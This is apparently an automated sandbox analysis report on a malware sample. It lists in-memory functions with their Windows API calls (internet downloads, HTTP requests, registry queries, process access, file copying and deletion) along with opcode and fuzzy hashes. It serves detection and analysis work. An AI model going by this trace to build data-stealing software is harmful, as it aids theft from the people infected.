                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                            • String ID:
                                                            • API String ID: 3894370878-0
                                                            • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                            • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                            • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                            • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                            Function 022D5217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022D5231
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D5238
                                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022D5251
                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022D5278
                                                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022D52A8
                                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 022D52F1
                                                            • InternetCloseHandle.WININET(?), ref: 022D5320
                                                            • InternetCloseHandle.WININET(?), ref: 022D532D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                            • String ID:
                                                            • API String ID: 1008454911-0
                                                            • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                            • Instruction ID: ee2c64580d4dec94019297141c0432774384836935dac6d87814800b00e75967
                                                            • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                            • Instruction Fuzzy Hash: 0A31F9B4A40218ABDB20CF94DC89BDCB7B5EB48704F5081D9F609A7284D7B46AC5CF59
                                                            Function 022E5777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022E58AB
                                                            • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022E5908
                                                            • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022E5ABE
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022E548F
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                                              • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5596
                                                              • Part of subcall function 022E5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                                              • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E55EA
                                                              • Part of subcall function 022E5527: strtok.MSVCRT(00000000,?), ref: 022E5605
                                                              • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5615
                                                            • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022E59F2
                                                            • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022E5BA7
                                                            • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022E5C73
                                                            • Sleep.KERNEL32(0000EA60), ref: 022E5C82
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                                            • String ID:
                                                            • API String ID: 3630751533-0
                                                            • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                            • Instruction ID: e0dad19829b9998260d0b21101c0b68568d91499336cf093027f9cc691bbf922
                                                            • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                            • Instruction Fuzzy Hash: FFE1FA71920304AACF18FBE0DD969FD737AAF65300FC08168A50766298EF785B58DF91
                                                            Function 022D1577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 022D158E
                                                              • Part of subcall function 022D1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                                              • Part of subcall function 022D1507: RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                                              • Part of subcall function 022D1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                                              • Part of subcall function 022D1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                                              • Part of subcall function 022D1507: RegCloseKey.ADVAPI32(?), ref: 022D1566
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022D15B6
                                                            • lstrlen.KERNEL32(?), ref: 022D15C3
                                                            • lstrcat.KERNEL32(?,004262EC), ref: 022D15DE
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022D16CC
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                              • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                              • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                              • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                              • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                              • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022D1756
                                                            • memset.MSVCRT ref: 022D177D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                            • String ID:
                                                            • API String ID: 3885987321-0
                                                            • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                            • Instruction ID: fb8d6179fda7bab45180705094579d78368cd3d266ec192a883a346b33f76260
                                                            • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                            • Instruction Fuzzy Hash: 8F515EB19603199BCF15FBA0DD91EED737EAF54300F8041A8A60B62194EF345B89CFA5
                                                            Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00876340,?,0042110C,?,00000000,?), ref: 0041696C
                                                            • sscanf.NTDLL ref: 00416999
                                                            • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00876340,?,0042110C), ref: 004169B2
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00876340,?,0042110C), ref: 004169C0
                                                            • ExitProcess.KERNEL32 ref: 004169DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$System$File$ExitProcesssscanf
                                                            • String ID: B
                                                            • API String ID: 2533653975-2248957098
                                                            • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                            • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                            • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                            • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                            Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                            • wsprintfA.USER32 ref: 00418459
                                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            • RegQueryValueExA.ADVAPI32(00000000,00879648,00000000,000F003F,?,00000400), ref: 004184EC
                                                            • lstrlenA.KERNEL32(?), ref: 00418501
                                                            • RegQueryValueExA.ADVAPI32(00000000,00879798,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                            • String ID: %s\%s
                                                            • API String ID: 3896182533-4073750446
                                                            • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                            • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                            • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                            • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                            Function 022D4A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??2@$CrackInternetlstrlen
                                                            • String ID: <
                                                            • API String ID: 1683549937-4251816714
                                                            • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                            • Instruction ID: 0ebf7afa77a7499f55e7d8a0e3a91045032743aa6deee66afbcbfd2db8279f76
                                                            • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                            • Instruction Fuzzy Hash: DF215BB5D00219ABDF10DFA4E848AED7B75FF44320F008225F925A7290EB706A05CF91
                                                            Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                            • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00873040,00000000,00020119,00000000), ref: 004176DD
                                                            • RegQueryValueExA.ADVAPI32(00000000,00879768,00000000,00000000,?,000000FF), ref: 004176FE
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID: Windows 11
                                                            • API String ID: 3466090806-2517555085
                                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                            Function 022E78F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E790B
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7912
                                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022E7944
                                                            • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022E7965
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 022E796F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID: Windows 11
                                                            • API String ID: 3225020163-2517555085
                                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction ID: abc0e968c0233fa8e894c544106124b9d0fc15a27f8f0594f8b23556f590e95e
                                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction Fuzzy Hash: A0012CB9A80205BBEB10DBE0ED49FADB7B9EB48701F405154FA0597284D6749900DB51
                                                            Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00873040,00000000,00020119,004176B9), ref: 0041775B
                                                            • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                            • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID: CurrentBuildNumber
                                                            • API String ID: 3466090806-1022791448
                                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                            Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                            • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                            • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleSize
                                                            • String ID: :A$:A
                                                            • API String ID: 1378416451-1974578005
                                                            • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                            • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                            • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                            • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                            Function 022D7537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                                            • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
                                                            • HeapFree.KERNEL32(00000000), ref: 022D76C0
                                                              • Part of subcall function 022D94A7: vsprintf_s.MSVCRT ref: 022D94C2
                                                            • task.LIBCPMTD ref: 022D77BC
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                            • String ID:
                                                            • API String ID: 700816787-0
                                                            • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                            • Instruction ID: 985516c6a567e9979c7789ec1ba92c41fceb340a74dbe4baf8dcf9c2376ddfbd
                                                            • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                            • Instruction Fuzzy Hash: D0612BB5D1026C9BDB24DB90CC44FE9B7B9BF48304F0085E9E649A6144DBB4ABC6CF91
                                                            Function 022E5527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                                              • Part of subcall function 022D64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022D656A
                                                              • Part of subcall function 022D64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                                              • Part of subcall function 022D64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                                              • Part of subcall function 022D64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                                              • Part of subcall function 022D64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                                            • lstrlen.KERNEL32(00000000), ref: 022E5596
                                                              • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                                            • lstrlen.KERNEL32(00000000), ref: 022E55EA
                                                            • strtok.MSVCRT(00000000,?), ref: 022E5605
                                                            • lstrlen.KERNEL32(00000000), ref: 022E5615
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                            • String ID:
                                                            • API String ID: 3532888709-0
                                                            • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                            • Instruction ID: 1ced987d4e87149b9c0a6b98270ef0a8d6ce9bfccf57fa706730ccda712ff8dc
                                                            • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                            • Instruction Fuzzy Hash: C951D6709203489BCF28EFE4CA95AFD7776AF60304FD04018E80B666A8EB746B55DF51
                                                            Function 022E7337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022E7345
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,022E7574,004205BD), ref: 022E7383
                                                            • memset.MSVCRT ref: 022E73D1
                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022E7525
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenProcesslstrcpymemset
                                                            • String ID:
                                                            • API String ID: 224852652-0
                                                            • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                            • Instruction ID: 446d094d11ffc115d9bd27588527ddb05539baa11e63a0a4d21ca1f5bf8cb074
                                                            • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                            • Instruction Fuzzy Hash: A0518FB0C203199BDF24DBE4DC84BEDF775AF44305F9041A9E606A7284EB746A88DF58
                                                            Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004140D5
                                                            • RegOpenKeyExA.ADVAPI32(80000001,008799B8,00000000,00020119,?), ref: 004140F4
                                                            • RegQueryValueExA.ADVAPI32(?,0087A770,00000000,00000000,00000000,000000FF), ref: 00414118
                                                            • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
